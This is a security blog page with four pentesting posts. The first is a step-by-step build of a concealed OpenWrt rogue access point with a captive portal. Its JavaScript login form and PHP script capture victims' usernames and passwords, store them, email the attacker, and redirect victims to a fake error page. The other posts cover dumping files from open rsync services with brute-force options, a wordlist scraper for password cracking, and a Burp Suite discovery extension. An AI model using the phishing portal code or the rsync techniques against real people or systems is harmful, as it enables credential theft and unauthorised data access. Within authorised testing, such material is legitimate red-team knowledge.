Monday, March 27, 2017

Captive Portal WiFi Phishing with OpenWrt

As companies and organizations are becoming more aware of security risks and implementing proper protections it can be difficult for pentesters and red teams to gain access to a network. Social engineering is a great way to accomplish that initial entry. Unfortunately when phishing e-mails or calls aren't working and you don't want to be too aggressive in your tactics you need another method. What if we create an access point (AP) in the company's vicinity and redirect any users who connect, hopefully employees of our target company, to a customized captive portal splash page to steal credentials? It would be similar to what you might find when connecting to a hotel wireless AP. In this attack we are depending on employees' desires to use their company or personal devices on an unmonitored "guest" wireless network - separate from the company's main AP.

There are many tools which conduct wireless attacks such as Wifiphisher, however, these typically perform aggressive attacks such as forcing a man-in-the-middle connection. Setting up a captive portal is a more passive approach. Something like a captive portal can be done with WiFi Pineapple, but I wanted to create my own for customization, cost savings, and fun.

For this project I wanted something small and portable which can be hidden in or around a company's physical location. I chose the TP-Link TL-MR3020 router which ranges from $30-$50. For storage and concealment purposes I used a SanDisk Cruzer Fit 8GB USB flash drive which can be bought for as little as $7. Optionally a portable battery pack can be used to power the router and those are fairly inexpensive as well. To connect my router to the internet during an attack I am using a Verizon MiFi, however, you could also use a nearby public AP as well.

The router is meant to be a client of the MiFi while broadcasting its own AP which redirects users to the captive portal where credentials can be stolen or malware can be introduced. Once we get a positive hit we can use the internet connection to contact us remotely. A diagram of the attack would look something like this:

The following is a step-by-step guide of my process. Skip to step 7 for the good stuff!

Step 1: Flash default router firmware

The default URL to access the web interface of the TP-Link router is with the credentials of admin:admin. For more detailed information regarding the router’s default configuration consult the router's user guide. Now flash the default firmware with the factory OpenWrt Barrier Breaker 14.07 firwmare: openwrt-ar71xx-generic-tl-mr3020-v1-squashfs-factory.bin. Note: No other version of OpenWrt has enough space to install the packages required to use the flash drive and expand the storage. After flashing OpenWrt you should be able to access the web interface at If you are having issues connecting try disabling other network adapters not being used to communicate with the router.

You may want to change the router’s IP address while you are setting everything up if it conflicts with other devices on your network. Go to Network > Interfaces > (br-lan) Edit > IPv4 Address to > Save & Apply. After the settings are saved you will probably need to request a new address to be able to connect to

Step 2: Connect router to internet

To connect the TP-Link TL-MR3020 router to the internet it must be a client of another internet-connected router first. To do this go to Network > Wifi > Scan > Join Network > WPA Passphrase (if applicable) > Submit. By default the mode should be “Client”. Submit these changes for the MR3020 to become a client of your home router. At this point you can confirm you have internet access by updating the package list or pinging a public host via SSH.

Step 3: Expand memory

The TP-Link TL-MR3020 router comes with very little memory which makes installing the packages I wanted impossible. Fortunately with a cheap flash drive I can expand that memory. I followed this resource from using ExtRoot, however, when I tried installing the packages via the command opkg install block-mount kmod-usb-storage kmod-fs-ext4 I received the following errors:

To fix these errors we use WinSCP to replace the /etc/opkg.conf file with the following then run opkg update via SSH:
src/gz barrier_breaker_packages
src/gz barrier_breaker_base
src/gz barrier_breaker_luci
src/gz barrier_breaker_management
src/gz barrier_breaker_routing
src/gz barrier_breaker_telephony
src/gz barrier_breaker_oldpackages
dest root /
dest ram /tmp
lists_dir ext /var/opkg-lists
option overlay_root /overlay
Now the command opkg install block-mount kmod-usb-storage kmod-fs-ext4 should install the packages correctly. Just as ediy mentions, you can ignore a couple of kmod errors. Now reboot the router via the web interface or SSH. Partition the flash drive and insert it into the router. In an SSH terminal type block info to get the name of the flash drive:
Now the following commands can be used to copy rootfs to the flash drive:
mkdir /mnt/sda1
mount /dev/sda1 /mnt/sda1
mkdir -p /tmp/cproot
mount --bind / /tmp/cproot
tar -C /tmp/cproot/ -cvf - . | tar -C /mnt/sda1/ -xf –
umount /tmp/cproot/
If /etc/config/fstab does not exist on the router, type “block detect > /etc/config/fstab” via SSH and now make the following changes to the file via WinSCP:
Now the router can be rebooted and verify the increased amount of space using df –h.

Step 4: Create access point

To create an access point to broadcast to potential victims go to Network > Wifi > Add and create the following interface. Make sure the lan checkbox is checked. Select Wireless Security if you want to configure authentication. Save & Apply these settings. You should now have your TP-Link TL-MR3020 router as a client to your home router which it will use for internet and also its own broadcasting access point.

Step 5: Install NoDogSplash

To install NoDogSplash I used the web interface by going to System > Software > Filter “nodogsplash” > Find package > Install. If you can’t find the nodogsplash package, be sure to update your package lists:

Step 6: Install PHP

The ability to install various packages such as PHP was one of the main reasons why I initially expanded the amount of storage I had. Installing PHP is optional depending on what functionality you want and how you implement it. Since the NoDogSplash server does not support PHP, this allows me to use PHP with the default OpenWRT uHTTPd server without installing another separate web server. Installing PHP is easy via SSH with the opkg install php5 php5-cgi command. If this doesn’t work make sure you have the line src/gz barrier_breaker_oldpackages in your /etc/opkg.config file and update the package list. Finally in the /etc/config/uhttpd file add the line list interpreter '.php=/usr/bin/php-cgi' to the 'main' section.

Step 7: Configure splash page and capture credentials

This is the fun part where we can get creative! We want to create a splash page which is specific to our target environment in an attempt to trick users into submitting their credentials to us. We could also attempt to execute malicious JavaScript or serve a malicious file such as an executable, browser extension, or PDF. For now we will just capture user input such as local or network credentials which we can use to gain a foothold in the network or for use in other attacks.
Creating a realistic splash page targeted towards a company or organization can be accomplished with a simple mix of JavaScript, HTML, and CSS. Most companies will have specific logos, public images, color schemes, fonts, and more which can be used to create a realistic splash page. Here is an example of a simple splash page with a login form:

To capture any submitted credentials I use the following code for the login form (snippet):
<script type="text/javascript">
 function submitTextToCapture() {
      username = document.getElementById("username").value;
      password = document.getElementById("password").value;
      window.location = "" + username + "&password=" + password;
<form class="login-form">
 <input type="text" id="username" placeholder="username"/>
 <input type="password" id ="password" placeholder="password"/>
 <button type="button" id="button" onclick="submitTextToCapture()">Continue</button>
This splash page is served from the NoDogSplash server (/etc/nodogsplash/htdocs/) using port 2050. After a user enters their credentials and submits them, window.location redirects the user to capture.php which is served from the default OpenWRT uHTTPd server (/www/) on port 80. Sending the credentials to our capture.php page now gives us the ability to use PHP to perform the actions we want. As an example, I want to store credentials to the router and send myself an e-mail to alert me after credentials have been captured. To write to a local file I use the PHP fwrite function:
$username = $_GET["username"];
$password = $_GET["password"];
$redir = "";

$file = fopen("stored.txt", "a");
fwrite($file, "Username: " . $username . "\n" . "Password: " . $password . "\n\n");
To send an e-mail alert install msmtp on the router by running the command opkg install msmtp. Once installed, edit the /etc/msmtprc configuration file to include mail host information:
The php.ini file must then be edited to include the line sendmail_path = "/usr/bin/msmtp -C /path/to/your/config -t" which is usually /etc/msmtprc. For further instruction, see here. I then included the following code in my capture.php file to send an e-mail alert with some information about the client and redirect them to a fake error page:
$browser = $_SERVER['HTTP_USER_AGENT'];
$referrer = $_SERVER['HTTP_REFERER'];

$msg = "Credentials have been captured!\n\nIP: {$ip}\nBrowser: {$browser}\nReferrer: {$referrer}";

mail("","*Captured Credentials*",$msg);

echo '<script type="text/javascript">window.location = "' . $redir . '"</script>';
The final result is an e-mail alert and the credentials being stored to a local file on the router:
Lastly, we can redirect the user to an error page stating the WiFi service is unavailable for some reason to reduce suspicions since we never intended on actually providing internet access. The goal of this attack is to be passive and inconspicuous.
All done! In the future I may post various ways to deliver other realistic payloads such as a malicious executable or browser extension.

Resources: - Found this after my project, similar actions for pineapple.

Thursday, March 23, 2017

SmeegeScrape: Text Scraper and Custom Word List Generator

Click Here to Download Source Code

Customize your security testing with! It's a simple python script to scrape text from various sources including local files and web pages, and turn the text into a custom word list. A customized word list has many uses, from web application testing to password cracking, having a specific set of words to use against a target can increase efficiency and effectiveness during a penetration test. I realize there are other text scrapers publicly available however I feel this script is simple, efficient, and specific enough to warrant its own release. This script is able to read almost any file which has cleartext in it that python can open. I have also included support for file formats such as pdf, html, docx, and pptx.


Usage: {-f file | -d directory | -u web_url | -l url_list_file} [-o output_filename] [-s] [-i] [-min #] [-max #]

One of the following input types is required:(-f filename), (-d directory), (-u web_url), (-l url_list_file)

-h, --help show this help message and exit
-f LOCALFILE, --localFile LOCALFILE Specify a local file to scrape
-d DIRECTORY, --fileDirectory DIRECTORY Specify a directory to scrape the inside files
-u URL, --webUrl URL Specify a url to scrape page content (correct format: http(s)://
-l URL_LIST_FILE, --webList URL_LIST_FILE Specify a text file with a list of URLs to scrape (separated by newline)
-o FILENAME, --outputFile FILENAME Specify output filename (default: smeegescrape_out.txt)
-i, --integers Remove integers [0-9] from all output
-s, --specials Remove special characters from all output
-min # Specify the minimum length for all words in output
-max # Specify the maximum length for all words in output

Scraping a local file: -f Test-File.txt
This is a sample text file with different text.
This file could be different filetypes including html, pdf, powerpoint, docx, etc.  
Anything which can be read in as cleartext can be scraped.
I hope you enjoy SmeegeScrape, feel free to comment if you like it!


Each word is separated by a newline. The options -i and -s can be used to remove any integers or special characters found. Also, the -min and -max arguments can be used to specify desired word length.

Scraping a web page: -u -si

To scrape web pages we use the python urllib2 module. The format of the url is checked via regex and it must be in the correct format (e.g. http(s)://

web scrape output

Scraping multiple files from a directory: -d test\ -si -min 5 -max 12

The screen output shows each file which was scraped, the total number of unique words found based on the user's desired options, and the output filename.

directory scrape output

Scraping multiple URLs: -l weblist.txt -si -min 6 -max 10

The -l option takes in a list of web urls from a text file and scrapes each url. Each scraped URL is displayed on the screen as well as a total number of words scraped.

url list scraping url list scraping 2

This weblist option is excellent to use with Burp Suite to scrape an entire site. To do this, proxy your web traffic through Burp and discover as much content on the target site as you can (spidering, manual discovery, dictionary attack on directories/files, etc.). After the discovery phase, right click on the target in the site map and select the option "Copy URLs in this host" from the drop down list. In this instance for even a small blog like mine over 300 URLs were copied. Depending on the size of the site the scraping could take a little while, be patient!

burp copy URLs in host

Now just paste the URLs into a text file and run that as input with the -l option. -l SmeegeScrape-Burp-URLs.txt -si -min 6 -max 12
final output after parsing

So very easily we just scraped an entire site for words with specific attributes (length and character set) that we want.

As you can see there are many different possibilities with this script. I tried to make it as accurate as possible however sometimes the script depends on modules such as nltk, docx, etc. which may not always work correctly. In situations like this where the script is unable to read a certain file format, I would suggest trying to convert it to a more readable file type or copy/paste the text to a text file which can always be scraped.

The custom word list dictionaries you create are up to your imagination so have fun with it! This script could also be easily modified to extract phrases or sentences which could be used with password cracking passphrases. Here are a couple examples I made:

Holy Bible King James Version of 1611: -f HolyBibleDocx.docx -si -min 6 -max 12 -o HolyBible_scraped.txt

Shakespeare's Romeo and Juliet: -u -si -min 6 -max 12 -o romeo_juliet_scraped.txt

Feel free to share your scraped lists or ideas on useful content to scrape. Comments and suggestions welcome, enjoy!

Thursday, December 15, 2016

Pentesting Rsync

Pentesting rsync.. is what I googled when I first saw it reported as an open service from Nessus. I hadn't seen it much and most available documentation about it was just a short usage manual. Rsync (Remote Sync) is an open source utility that provides fast incremental file transfer. Rsync copies files either to or from a remote host, or locally on the current host. It is commonly found on *nix systems and functions as both a file synchronization and file transfer program.

According to There are two different ways for rsync to contact a remote system: using a remote-shell program as the transport (such as ssh or rsh) or contacting an rsync daemon directly via TCP. The remote-shell transport is used whenever the source or destination path contains a single colon (:) separator after a host specification. Contacting an rsync daemon directly happens when the source or destination path contains a double colon (::) separator after a host specification, OR when an rsync:// URL is specified.

So how do we detect rsync and take advantage of it during a pentest? During a recent test one of the Nessus results was plugin 11389 which is rsync service detection. Furthermore each of the hosts in the “Hosts” section had a list of rsync modules with their name, description, and access rights.

The default port you will typically find an rsync daemon running on is 873 and also potentially 8873. If you aren’t using nessus a simple nmap scan of those ports will let you know if either port is open. Once you have determined an rsync service is running you can use the metasploit module auxiliary/scanner/rsync/modules_list which lists the names of the modules the same way the Nessus plugin did.

Alternatively you can also use the nmap script rsync-list-modules to get a list of rsync modules.

nmap --script=rsync-list-modules <ip> -p 873

Once you have the list of modules you have a few different options depending on the actions you want to take and whether or not authentication is required. If authentication is not required you can copy all files to your local machine via the following command:

rsync -av /data/tmp

This recursively transfers all files from the directory “module_name_1” on the machine into the /data/tmp directory on the local machine. The files are transferred in "archive" mode, which ensures that symbolic links, devices, attributes, permissions, ownerships, etc. are preserved in the transfer. Happy dumpster diving!

But… what if authentication is required? Some modules on the remote daemon may require authentication. If so, you will receive a password prompt when you connect. As a pentester you still have options! There is a NSE script called rsync-brute which performs brute force password auditing against the rsync remote file syncing protocol.


Tuesday, February 2, 2016

Burp Suite Extension: Burp Importer

Burp Importer is a Burp Suite extension written in python which allows users to connect to a list of web servers and populate the sitemap with successful connections. Burp Importer also has the ability to parse Nessus (.nessus), Nmap (.gnmap), or a text file for potential web connections. Have you ever wished you could use Burp’s Intruder to hit multiple targets at once for discovery purposes? Now you can with the Burp Import extension. Use cases for this extension consist of web server discovery, authorization testing, and more!

Click here to download source code


  1. Download Jython standalone Jar:
  2. In the Extender>Options tab point your Python Environment to the Jython file.
  3. Add Burp Importer in the Extender>Extensions tab.

General Use

Burp Importer is easy to use as it’s fairly similar to Burp’s Intruder tool. The first section of the extension is the file load option which is optional and used to parse Nessus (.nessus), Nmap (.gnmap), or a list of newline separated URLs (.txt). Nessus files are parsed for the HTTP Information Plugin (ID 24260). Nmap files are parsed for open common web ports from a predefined dictionary. Text files should be a list of URLs which conform to the format and separated by a newline. After the files are parsed a list of generated URLs will be added to the URL List box.

The URL List section is almost identical to Burp Intruder’s Payload Options. Users have the ability to paste a list of URLs, copy the current list, remove a URL from the list, clear the entire list, or add an individual URL. A connection to each item in the list will be attempted using the class and Burp makeHttpRequest method.

Gnamp file parsed example:

Nessus file parsed example:

The last section of the extension provides the user a checkbox option to follow redirects, run the list of URLs, and a run log. Redirects are determined by 301 and 302 status codes and based on the ‘Location’ header in the response. The run log displays the same output which shows in the Extender>Extensions>Output tab. It shows basic data any time you run the URL list such as successful connections, number of redirects (if enabled), and a list of URLs which are malformed or have connectivity issues.

Running a list of hosts:

Items imported into the sitemap:

Use Case – Discovery

One of the main motivations for creating this extension was to help the discovery phase of an application or network penetration test. Parsing through network or vulnerability scan results can be tedious and inefficient which is why automation is a vital part of penetration testing. This extension can be utilized as just a file parser which generates valid URLs to use with other tools and can also be used to gain quick insight into the web application scope of a network. There are many ways to utilize this tool from a discovery perspective, which include:

  • Determine the web scope of an environment via successful connections added to the sitemap.
  • Search or scrape for certain information from multiple sites. An example of this would be searching multiple sites for e-mail addresses or other specific information.
  • Determine the low-level vulnerability posture of multiple sites or pages via spidering then passive or active scanning.

Use Case – Authorization Testing

Another way to use this extension is to check an application for insecure direct object references. This refers to restricting objects or pages only to users who are authorized. To do this requires at least one set of valid credentials or potentially more depending on how many user roles are being tested. Also, session handling rules must be set to use cookies from Burp’s cookie jar with Extender.

The following steps can then be performed:

  1. Authenticate with the highest privileged account and spider/discover as many objects and pages as possible. Don’t forget to use intruder to search for hidden directories as well as convert POST requests to GET which can also be used to access additional resources (if allowed by the server of course).
  2. In the sitemap right click on the host at the correct path and select ‘Copy URLs in this branch.’ This will give you a list of resources which were accessed by the high privileged account.
  3. Logout and clear any saved session information.
  4. Login with a lower privileged user which could also be a user with no credentials or user role at all. Be sure you have an active session with this user.
  5. Open the Burp Importer tab and paste the list of resources retrieved from the higher privileged account into the URL List box. Select the ‘Enable: Follow Redirects’ box as it helps you know if you are being redirected to a login or error page.
  6. Analyze the results! A list of ‘failed’ connections and the number of redirects will automatically be added to the Log box. These are a good indicator if the lower privileged session was able to access the resources or if they were just redirected to a login/error page. The sitemap should also be searched to manually verify if any unauthorized resources were indeed successfully accessed. Entire branches of responses can be searched using regex and a negative match for the ‘Location’ header to find valid connections.
Here we can see the requests made to the DVWA application while logged in as 'admin' were not able to connect and redirected to the login page after the original administrative session was logged out of and killed. During this use case the DVWA application was not vulnerable to insecure direct object references.

There are many other uses for this extension just use your imagination! If you come up with any cool ideas or have any comments please reach out to me.